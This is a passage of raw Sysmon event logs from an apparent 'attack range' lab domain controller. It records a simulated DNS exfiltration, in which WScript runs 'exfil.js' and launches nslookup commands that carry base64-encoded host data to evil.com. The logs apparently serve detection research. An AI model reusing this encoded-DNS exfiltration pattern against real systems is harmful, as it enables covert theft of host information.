process>-udptruefalse127.0.0.1-52833-false127.0.0.1-53domain 354300x8000000000000000201780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.143{00000000-0000-0000-0000-000000000000}1788<unknown process>-udpfalsefalse127.0.0.1-52832-false127.0.0.1-53domain 354300x8000000000000000201779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.143{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52832- 354300x8000000000000000201778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.142{00000000-0000-0000-0000-000000000000}1788<unknown process>-udptruefalse127.0.0.1-52832-false127.0.0.1-53domain 354300x8000000000000000201777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.040{00000000-0000-0000-0000-000000000000}5992<unknown process>-udpfalsefalse127.0.0.1-52831-false127.0.0.1-53domain 354300x8000000000000000201776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.039{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52831- 354300x8000000000000000201775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.039{00000000-0000-0000-0000-000000000000}5992<unknown process>-udptruefalse127.0.0.1-52831-false127.0.0.1-53domain 354300x8000000000000000201774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.039{00000000-0000-0000-0000-000000000000}5992<unknown process>-udpfalsefalse127.0.0.1-52830-false127.0.0.1-53domain 354300x8000000000000000201773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.038{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52830- 354300x8000000000000000201772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.038{00000000-0000-0000-0000-000000000000}5992<unknown process>-udptruefalse127.0.0.1-52830-false127.0.0.1-53domain 354300x8000000000000000201771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.038{00000000-0000-0000-0000-000000000000}5992<unknown process>-udpfalsefalse127.0.0.1-52829-false127.0.0.1-53domain 354300x8000000000000000201770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.037{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52829- 354300x8000000000000000201769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.037{00000000-0000-0000-0000-000000000000}5992<unknown process>-udptruefalse127.0.0.1-52829-false127.0.0.1-53domain 354300x8000000000000000201768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.910{00000000-0000-0000-0000-000000000000}5792<unknown process>-udpfalsefalse127.0.0.1-52828-false127.0.0.1-53domain 354300x8000000000000000201767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.909{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52828- 10341000x8000000000000000201766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.645{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-0241-000000005F02}4832C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000201765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.909{00000000-0000-0000-0000-000000000000}5792<unknown process>-udptruefalse127.0.0.1-52828-false127.0.0.1-53domain 10341000x8000000000000000201764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.645{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-0241-000000005F02}4832C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.645{2E1864BB-17C4-629A-0241-000000005F02}48327272C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-0141-000000005F02}7372C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.629{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-0241-000000005F02}4832C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.607{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.607{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.607{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.607{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.607{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-0141-000000005F02}7372C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.607{2E1864BB-17A1-629A-783D-000000005F02}55527176C:\Windows\System32\WScript.exe{2E1864BB-17C4-629A-0141-000000005F02}7372C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.611{2E1864BB-17C4-629A-0141-000000005F02}7372C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlirxao.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.607{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqfqm.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.561{2E1864BB-17C4-629A-FF40-000000005F02}34485136C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-0041-000000005F02}4484C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.561{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.561{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.561{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.561{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.561{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-0041-000000005F02}4484C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.545{2E1864BB-17C4-629A-FE40-000000005F02}30083956C:\Windows\system32\cmd.exe{2E1864BB-17C4-629A-0041-000000005F02}4484C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.560{2E1864BB-17C4-629A-0041-000000005F02}4484C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C4-629A-FE40-000000005F02}3008C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqfqm.tmp 2>&1 10341000x8000000000000000201745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.527{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-FF40-000000005F02}3448C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.527{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-FF40-000000005F02}3448C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.507{2E1864BB-17C4-629A-FF40-000000005F02}34485136C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-FE40-000000005F02}3008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.492{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-FF40-000000005F02}3448C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.492{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.492{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.492{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 